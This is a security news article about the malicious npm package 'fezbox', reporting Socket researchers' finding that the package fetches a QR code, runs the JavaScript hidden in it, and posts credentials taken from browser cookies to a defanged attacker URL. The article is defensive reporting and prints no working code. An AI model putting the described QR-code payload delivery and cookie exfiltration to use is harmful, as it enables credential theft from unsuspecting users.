New Malware Found in npm Package “fezbox” Uses QR Codes to Steal Credentials

The Socket Threat Research Team has uncovered a new malware campaign hiding inside an npm package called fezbox. While posing as a JavaScript/TypeScript utility library, the package conceals multiple layers of obfuscation — including the use of a QR code as a payload delivery mechanism.

According to the researchers, “fezbox, with layers of obfuscation including the innovative, steganographic use of a QR code. In this package, the threat actor… executes a payload within a QR code to steal username and password credentials from web cookies, within the browser.”

Fezbox presents itself as a collection of helper functions for developers. Its README highlights performance, TypeScript support, and even a “QR Code Module” for generating and parsing QR codes.

However, what isn’t disclosed is that importing the library triggers a hidden routine: “It does also describe a ‘QR Code Module’… However, it does not state that importing the library will fetch a QR code from a remote URL and execute the code contained in that QR.”

Once installed, fezbox runs heavily obfuscated scripts designed for browser-side execution. The malware waits 120 seconds before calling a function that downloads and parses a QR code from a Cloudinary image URL.

Socket highlights this stealth tactic: “In isDevelopment, and 2/3 times not in isDevelopment, this code does nothing. This is usually a stealth tactic. The threat actor does not want to risk being caught in a virtual environment or any non-production environment.”

When executed, the QR code itself contains a JavaScript payload, creating a second layer of obfuscation.

The payload’s purpose is straightforward: to steal credentials from cookies.

“Here, it reads a cookie from document.cookie. Then it gets the username and password, although again we see the obfuscation tactic of reversing the string (drowssap becomes password). If there is both a username and password in the stolen cookie, it sends the information via an HTTPS POST request to https://my-nest-app-production[.]up[.]railway[.]app/users.”

This exfiltration approach allows stolen credentials to be silently transmitted to the attacker’s server.

Fezbox employs at least three layers of obfuscation:

• Reversed strings (e.g., “drowssap” → “password”).
• QR code steganography to conceal the payload.
• Obfuscated JavaScript code using encoding and no-op red herrings.

As Socket notes, “Steganography is the practice of hiding a secret file in plain sight, something for which QR codes are great… Using a QR code as a steganographic obfuscation technique is quite clever and shows yet again that threat actors will continue to use any and all tools at their disposal.”

At the time of reporting, fezbox remained live on npm, though Socket confirmed it petitioned npm security to remove the package and suspend the threat actor’s account.

Developers are urged to immediately remove fezbox from their projects, audit dependencies, and rotate any credentials that may have been exposed.

Related Posts:

• QR Codes Coming to Linux Kernel Panics with 6.12 Release
• The Hidden Danger of PDF Files with Embedded QR Codes, Researchers Warn
• QR Code Phishing Attacks Escalate: Sophisticated Campaign Targets Chinese Citizens
• Android Boosts Anti-Theft Measures with AI and Biometric Security
• “Unicode QR Code Phishing”: The New Threat You Need to Know